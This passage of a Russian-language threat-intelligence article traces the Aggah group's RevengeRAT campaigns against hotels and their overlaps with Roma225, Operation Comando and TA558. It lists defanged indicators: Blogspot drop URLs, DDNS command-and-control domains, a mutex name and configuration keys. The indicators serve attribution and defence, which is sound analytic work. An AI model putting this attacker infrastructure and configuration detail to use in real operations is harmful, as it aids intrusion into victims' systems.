\u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u0435 RevengeRAT \u0447\u0435\u0440\u0435\u0437 PowerPoint-\u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u044b \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0441\u0435\u0440\u0432\u0438\u0441\u0430 Blogspot. \u0418\u0437 \u0434\u0430\u043d\u043d\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0438 \u0441\u0442\u043e\u0438\u0442 \u0437\u0430\u043f\u043e\u043c\u043d\u0438\u0442\u044c \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0432\u0430\u0436\u043d\u044b\u0445 \u0444\u0430\u043a\u0442\u043e\u0432:<\/p>\n<ul>\n<li>\n<p>\u041c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0435 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u043c\u043e\u0433\u043e \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430 (\u0430\u0432\u0442\u043e\u0440 C.D.T Original)<\/p>\n<\/li>\n<li>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0441\u043b\u043e\u0432\u043e\u0441\u043e\u0447\u0435\u0442\u0430\u043d\u0438\u044f \u00abCDT\u00bb \u0432 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0445 \u043a\u043e\u0434\u0430<\/p>\n<\/li>\n<\/ul>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/1f2\/07d\/0a1\/1f207d0a1e696e620627abe06708604b.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 3. \u041c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0435 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u043c\u043e\u0433\u043e \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 3. \u041c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0435 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u043c\u043e\u0433\u043e \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\" width=\"905\" height=\"281\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/1f2\/07d\/0a1\/1f207d0a1e696e620627abe06708604b.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/1f2\/07d\/0a1\/1f207d0a1e696e620627abe06708604b.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 3. \u041c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0435 \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u0435\u043c\u043e\u0433\u043e \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430<\/figcaption><\/div>\n<\/figure>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b0c\/173\/4b4\/b0c1734b428750fb677646b13a36a08e.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 4. \u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0441\u043a\u0440\u0438\u043f\u0442 \u0441 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u043c\u0438 &quot;CDT&quot; (\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: \u043e\u0442\u0447\u0435\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Yoroi)\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 4. \u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0441\u043a\u0440\u0438\u043f\u0442 \u0441 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u043c\u0438 &quot;CDT&quot; (\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: \u043e\u0442\u0447\u0435\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Yoroi)\" width=\"2093\" height=\"483\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/b0c\/173\/4b4\/b0c1734b428750fb677646b13a36a08e.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/b0c\/173\/4b4\/b0c1734b428750fb677646b13a36a08e.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 4. \u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0439 \u0441\u043a\u0440\u0438\u043f\u0442 \u0441 \u043f\u0435\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u043c\u0438 &#171;CDT&#187; (\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: \u043e\u0442\u0447\u0435\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Yoroi)<\/figcaption><\/div>\n<\/figure>\n<p>\u041d\u0430 \u0442\u043e\u0442 \u043c\u043e\u043c\u0435\u043d\u0442 Aggah \u0435\u0449\u0435 \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0438 \u0441\u0432\u043e\u0451 \u0438\u043c\u044f, \u043d\u043e \u043f\u043e\u043a\u0430 \u043e\u0442\u043c\u0435\u0442\u0438\u043c, \u0447\u0442\u043e TA558\u00a0 \u0432\u043f\u0435\u0440\u0432\u044b\u0435 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442\u0441\u044f \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0435\u0439<a href=\"https:\/\/www.proofpoint.com\/us\/blog\/threat-insight\/reservations-requested-ta558-targets-hospitality-and-travel\"> Proofpoint<\/a> \u0432 \u0442\u043e\u043c \u0436\u0435 2018 \u0433\u043e\u0434\u0443. \u0411\u043e\u043b\u0435\u0435 \u0442\u043e\u0433\u043e, \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b \u0432 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438 \u0443\u043f\u043e\u043c\u0438\u043d\u0430\u044e\u0442 \u0442\u0435 \u0436\u0435 \u043c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0435 \u0438 \u0441\u0435\u0442\u0435\u0432\u044b\u0435 \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438, \u0447\u0442\u043e \u0431\u044b\u043b\u0438 \u0432 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Roma225: \u0430\u0432\u0442\u043e\u0440 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430 <em>\u201cC.D.T Original\u201d<\/em> \u0438 \u0434\u043e\u043c\u0435\u043d <em>cdtmaster[.]com<\/em>, \u043e\u0434\u043d\u0430\u043a\u043e \u043d\u0438\u043a\u0430\u043a\u043e\u0439 \u0432\u0437\u0430\u0438\u043c\u043e\u0441\u0432\u044f\u0437\u0438 \u043c\u0435\u0436\u0434\u0443 Roma225 \u0438 TA558 \u043d\u0435 \u0431\u044b\u043b\u043e \u043e\u0442\u043c\u0435\u0447\u0435\u043d\u043e.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/db9\/bc0\/df6\/db9bc0df6a7178131bf2ff39bf78a784.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 5. \u0423\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0435 \u043c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0445 \u0432 \u0441\u0442\u0430\u0442\u044c\u0435 Proofpoint\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 5. \u0423\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0435 \u043c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0445 \u0432 \u0441\u0442\u0430\u0442\u044c\u0435 Proofpoint\" width=\"1876\" height=\"339\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/db9\/bc0\/df6\/db9bc0df6a7178131bf2ff39bf78a784.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/db9\/bc0\/df6\/db9bc0df6a7178131bf2ff39bf78a784.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 5. \u0423\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0435 \u043c\u0435\u0442\u0430\u0434\u0430\u043d\u043d\u044b\u0445 \u0432 \u0441\u0442\u0430\u0442\u044c\u0435 Proofpoint<\/figcaption><\/div>\n<\/figure>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d17\/75b\/e7b\/d1775be7b50c3595fca64a072f905b4e.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 6. \u0423\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0434\u043e\u043c\u0435\u043d\u0430 \u0432 \u0441\u0442\u0430\u0442\u044c\u0435 Proofpoint\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 6. \u0423\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0434\u043e\u043c\u0435\u043d\u0430 \u0432 \u0441\u0442\u0430\u0442\u044c\u0435 Proofpoint\" width=\"1832\" height=\"185\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/d17\/75b\/e7b\/d1775be7b50c3595fca64a072f905b4e.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/d17\/75b\/e7b\/d1775be7b50c3595fca64a072f905b4e.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 6. \u0423\u043f\u043e\u043c\u0438\u043d\u0430\u043d\u0438\u0435 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0433\u043e \u0434\u043e\u043c\u0435\u043d\u0430 \u0432 \u0441\u0442\u0430\u0442\u044c\u0435 Proofpoint<\/figcaption><\/div>\n<\/figure>\n<p><a class=\"anchor\" name=\"6.1.2.\" id=\"6.1.2.\"><\/a><\/p>\n<h4>6.1.2. \u0410\u0442\u0430\u043a\u0438 2019 \u0433\u043e\u0434\u0430<\/h4>\n<p>\u0412 \u043c\u0430\u0440\u0442\u0435 2019 \u0433\u043e\u0434\u0430 \u043e\u0442 Unit42 \u0432\u044b\u0448\u043b\u0430<a href=\"https:\/\/unit42.paloaltonetworks.com\/operation-comando-or-how-to-run-a-cheap-and-effective-credit-card-business\/\"> \u0441\u0442\u0430\u0442\u044c\u044f<\/a> \u043f\u0440\u043e Operation \u0421omando \u043d\u0430\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u043d\u0430 \u043e\u0442\u0435\u043b\u0438. \u041e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u043c\u0430\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u0438\u043c\u0435\u0435\u0442 \u0440\u044f\u0434 \u0441\u0445\u043e\u0434\u0441\u0442\u0432 \u0441 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0435\u0439 Roma225, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u043f\u043e\u043a\u0430\u0437\u0430\u043d\u044b \u0432 \u0442\u0430\u0431\u043b\u0438\u0446\u0435 \u043d\u0438\u0436\u0435. \u041d\u0430 \u043e\u0441\u043d\u043e\u0432\u0435 \u0443\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0445 \u043f\u0435\u0440\u0435\u0441\u0435\u0447\u0435\u043d\u0438\u0439 \u043c\u043e\u0436\u043d\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0432\u044b\u0432\u043e\u0434, \u0447\u0442\u043e \u043e\u0431\u0435 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u043c\u044b\u0435 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0438 \u043f\u0440\u0438\u043d\u0430\u0434\u043b\u0435\u0436\u0430\u0442 \u043e\u0434\u043d\u043e\u0439 \u0438 \u0442\u043e\u0439 \u0436\u0435 \u0445\u0430\u043a\u0435\u0440\u0441\u043a\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0435, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u0442\u0430\u043a\u0436\u0435 \u043d\u0430 \u0442\u043e\u0442 \u043c\u043e\u043c\u0435\u043d\u0442 \u043f\u043e\u043a\u0430 \u043d\u0435 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 Aggah.<\/p>\n<div>\n<div class=\"table\">\n<table>\n<tbody>\n<tr>\n<td>\n<p align=\"left\"><strong>Unit42 \u2013 Operation Comando<\/strong><\/p>\n<\/td>\n<td>\n<p align=\"left\"><strong>Yoroi \u2013 Roma225 Campaign<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\">\n<p align=\"left\"><strong>Dropurls<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">minhacasaminhavidacdt.blogspot[.]com<\/p>\n<\/td>\n<td>\n<p align=\"left\">minhacasaminhavidacdt.blogspot[.]com<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">internetexplorer200[.]blogspot[.]com<\/p>\n<\/td>\n<td>\n<p align=\"left\">pocasideiascdt.blogspot[.]com<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">\u00a0<\/p>\n<\/td>\n<td>\n<p align=\"left\">cdtmaster[.]com.br<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td colspan=\"2\">\n<p align=\"left\"><strong>C2<\/strong><\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">systenfailued.ddns[.]com[.]br<\/p>\n<\/td>\n<td>\n<p align=\"left\">systen32.ddns[.]net<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">office365update[.]duckdns[.]org<\/p>\n<\/td>\n<td>\n<p align=\"left\">office365update[.]duckdns.org<\/p>\n<\/td>\n<\/tr>\n<tr>\n<td>\n<p align=\"left\">cdtoriginal[.]ddns[.]net<\/p>\n<\/td>\n<td>\n<p align=\"left\">\u00a0<\/p>\n<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/div>\n<\/div>\n<p>\u0422\u0430\u0431\u043b\u0438\u0446\u0430 6. \u0421\u0440\u0430\u0432\u043d\u0435\u043d\u0438\u0435 \u0434\u043e\u043c\u0435\u043d\u043e\u0432 \u0438\u0437 \u0434\u0432\u0443\u0445 \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u0439<\/p>\n<p>\u0412 2019 \u0433\u043e\u0434\u0443<a href=\"https:\/\/www.proofpoint.com\/us\/blog\/threat-insight\/reservations-requested-ta558-targets-hospitality-and-travel\"> \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u043e\u0442\u0435\u043b\u0438<\/a> \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0430\u043b\u0438\u0441\u044c \u0438 \u043e\u0442 TA558, \u043d\u043e \u044f\u0432\u043d\u044b\u0445 \u043f\u0435\u0440\u0435\u0441\u0435\u0447\u0435\u043d\u0438\u0439 \u043c\u0435\u0436\u0434\u0443 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u043c\u044b\u043c\u0438 \u0430\u0442\u0430\u043a\u0430\u043c\u0438 \u043d\u0435\u0442.<\/p>\n<p><a class=\"anchor\" name=\"6.1.3.\" id=\"6.1.3.\"><\/a><\/p>\n<h4>6.1.3. Hagga (Aggah). \u0420\u043e\u0436\u0434\u0435\u043d\u0438\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438<\/h4>\n<p>\u0412 \u0430\u043f\u0440\u0435\u043b\u0435 2019 \u0433\u043e\u0434\u0430 Unit42<a href=\"https:\/\/unit42.paloaltonetworks.com\/aggah-campaign-bit-ly-blogspot-and-pastebin-used-for-c2-in-large-scale-campaign\/\"> \u0432\u044b\u043f\u0443\u0441\u043a\u0430\u044e\u0442 \u0441\u0442\u0430\u0442\u044c\u044e<\/a>, \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u043d\u0430\u0437\u044b\u0432\u0430\u044e\u0442 &#171;Aggah Campaign\u201d. \u0412 \u0434\u0430\u043d\u043d\u043e\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0438 \u043e\u043f\u0438\u0441\u044b\u0432\u0430\u043b\u0438\u0441\u044c \u0430\u0442\u0430\u043a\u0438 \u0441 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0412\u041f\u041e RevengeRAT \u0438 \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0445 \u0441\u0435\u0440\u0432\u0438\u0441\u043e\u0432 Pastebin, Blogspot, <a href=\"http:\/\/Bit.ly\">Bit.ly<\/a>. \u0422\u043e\u0433\u0434\u0430 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u0430\u044f \u043a\u0430\u043c\u043f\u0430\u043d\u0438\u044f \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0430 \u0441\u0432\u043e\u0435 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u0438\u0437-\u0437\u0430 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0433\u043e \u0441\u043b\u043e\u0432\u0430 \u201chagga\u201d \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u0412\u041f\u041e. \u0422\u0430\u043a\u0443\u044e \u0436\u0435 \u0441\u0442\u0440\u043e\u0447\u043a\u0443 \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043b\u043e \u0438 \u0438\u043c\u044f \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f \u043d\u0430 \u0441\u0430\u0439\u0442\u0435 Pastebin. \u041d\u043e \u0433\u043b\u0430\u0432\u043d\u043e\u0435 \u0432 \u044d\u0442\u043e\u0439 \u0441\u0442\u0430\u0442\u044c\u0435 \u2013 \u043f\u043e\u043a\u0430\u0437\u0430\u043d\u043d\u044b\u0435 \u0432 \u043d\u0435\u0439 \u043f\u0435\u0440\u0435\u0441\u0435\u0447\u0435\u043d\u0438\u044f \u0441 \u043f\u0440\u043e\u0448\u043b\u044b\u043c \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435\u043c:<\/p>\n<ul>\n<li>\n<p>\u041d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 \u043c\u044c\u044e\u0442\u0435\u043a\u0441\u0430 \u0441 \u0434\u043e\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0439 \u043e\u0448\u0438\u0431\u043a\u043e\u0439 \u0432 \u0441\u043b\u043e\u0432\u0435 \u201cSystem32\u201d &#8212; RV_MUTEX-WindowsUpdateSyste<strong>n<\/strong>32<\/p>\n<\/li>\n<li>\n<p>\u0418\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u043a\u043b\u044e\u0447\u0435\u0439 \u201coldman\u201d, \u201csteve\u201d, \u201chagga\u201d, \u201croma225\u201d \u0432 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 RevengeRAT<\/p>\n<\/li>\n<li>\n<p>\u0421\u0435\u0442\u0435\u0432\u044b\u0435 \u0438\u043d\u0434\u0438\u043a\u0430\u0442\u043e\u0440\u044b \u0438\u0437 \u043f\u0440\u0435\u0434\u044b\u0434\u0443\u0449\u0438\u0445 \u0430\u0442\u0430\u043a: office365update.duckdns[.]org, systen32.ddns[.]net<\/p>\n<\/li>\n<\/ul>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/153\/137\/4d9\/1531374d918d10e2a74dca5df81f96f6.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 7. \u041a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f RevengeRAT \u0441 \u043a\u043b\u044e\u0447\u043e\u043c &quot;hagga&quot; (\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: \u043e\u0442\u0447\u0435\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Unit42)\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 7. \u041a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f RevengeRAT \u0441 \u043a\u043b\u044e\u0447\u043e\u043c &quot;hagga&quot; (\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: \u043e\u0442\u0447\u0435\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Unit42)\" width=\"750\" height=\"368\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/153\/137\/4d9\/1531374d918d10e2a74dca5df81f96f6.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/153\/137\/4d9\/1531374d918d10e2a74dca5df81f96f6.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 7. \u041a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f RevengeRAT \u0441 \u043a\u043b\u044e\u0447\u043e\u043c &#171;hagga&#187; (\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: \u043e\u0442\u0447\u0435\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Unit42)<\/figcaption><\/div>\n<\/figure>\n<p>\u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, \u0438\u043c\u0435\u043d\u043d\u043e Aggah \u0441\u0442\u043e\u044f\u043b\u0438 \u0437\u0430 Roma225 \u0438 Operation Comando.<\/p>\n<p>\u041e\u0434\u0438\u043d \u0438\u0437 \u0441\u0430\u043c\u044b\u0445 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0445 \u0444\u0430\u043a\u0442\u043e\u0432 \u2013 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u0430 <em>\u201cHOTEIS NOVOS\u201d<\/em> (<em>\u201cNEW HOTELS\u201d <\/em>\u0432 \u043f\u0435\u0440\u0435\u0432\u043e\u0434\u0435 \u0441 \u043f\u043e\u0440\u0442\u0443\u0433\u0430\u043b\u044c\u0441\u043a\u043e\u0433\u043e) \u0432 \u0430\u0442\u0430\u043a\u0430\u0445.\u00a0 \u042d\u0442\u043e\u0442 \u043c\u043e\u043c\u0435\u043d\u0442 \u043f\u0440\u0438\u043c\u0435\u0447\u0430\u0442\u0435\u043b\u0435\u043d \u0442\u0435\u043c, \u0447\u0442\u043e \u0433\u0440\u0443\u043f\u043f\u0430 \u0422\u0410558 \u0432 \u044d\u0442\u043e \u0436\u0435 \u0432\u0440\u0435\u043c\u044f \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u043b\u0430 \u0430\u0442\u0430\u043a\u0438 \u043d\u0430 \u043e\u0442\u0435\u043b\u0438 \u0441 \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u043c\u0438 \u043f\u0438\u0441\u044c\u043c\u0430\u043c\u0438 \u0438 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0438 \u0442\u0430\u043a\u0436\u0435 \u043d\u0430 \u043f\u043e\u0440\u0442\u0443\u0433\u0430\u043b\u044c\u0441\u043a\u043e\u043c.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/73c\/469\/397\/73c4693978479e504cf6d8cb8f2235fb.png\" alt=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 8. \u041a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f RevengeRAT \u0441 \u043f\u043e\u0440\u0442\u0443\u0433\u0430\u043b\u044c\u0441\u043a\u0438\u043c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u043c (\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: \u043e\u0442\u0447\u0435\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Unit42)\" title=\"\u0420\u0438\u0441\u0443\u043d\u043e\u043a 8. \u041a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f RevengeRAT \u0441 \u043f\u043e\u0440\u0442\u0443\u0433\u0430\u043b\u044c\u0441\u043a\u0438\u043c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u043c (\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: \u043e\u0442\u0447\u0435\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Unit42)\" width=\"750\" height=\"437\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/73c\/469\/397\/73c4693978479e504cf6d8cb8f2235fb.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/73c\/469\/397\/73c4693978479e504cf6d8cb8f2235fb.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0420\u0438\u0441\u0443\u043d\u043e\u043a 8. \u041a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u044f RevengeRAT \u0441 \u043f\u043e\u0440\u0442\u0443\u0433\u0430\u043b\u044c\u0441\u043a\u0438\u043c \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u043c (\u0418\u0441\u0442\u043e\u0447\u043d\u0438\u043a: \u043e\u0442\u0447\u0435\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Unit42)<\/figcaption><\/div>\n<\/figure>\n<p><a class=\"anchor\" name=\"6.1.4.\" id=\"6.1.4.\"><\/a><\/p>\n<h4>6.1.4. \u0410\u0442\u0430\u043a\u0438 2020-2022 \u0433\u043e\u0434\u043e\u0432<\/h4>\n<p>\u0412 2019 \u2013 2021 \u0433\u043e\u0434\u0430\u0445 Aggah<a href=\"https:\/\/web.archive.org\/web\/20211016101818\/https:\/yoroi.company\/research\/apt-or-not-apt-whats-behind-the-aggah-campaign\/\"> \u0440\u0430\u0441\u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u044f\u043b\u0438<\/a> AzoRult, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044f \u0441\u0432\u043e\u044e \u043f\u0430\u043d\u0435\u043b\u044c \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f &#8212; ManaTools. \u0421\u043b\u043e\u0432\u043e \u00abmana\u00bb \u0447\u0430\u0441\u0442\u043e \u0431\u0443\u0434\u0435\u0442 \u0432\u0441\u0442\u0440\u0435\u0447\u0430\u0442\u044c\u0441\u044f \u2013 \u0432 \u0430\u0432\u0442\u043e\u0440\u0430\u0445 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432 \u0438 \u0434\u043e\u043c\u0435\u043d\u0430\u0445. \u0412 \u043e\u0434\u043d\u043e\u043c \u0438\u0437 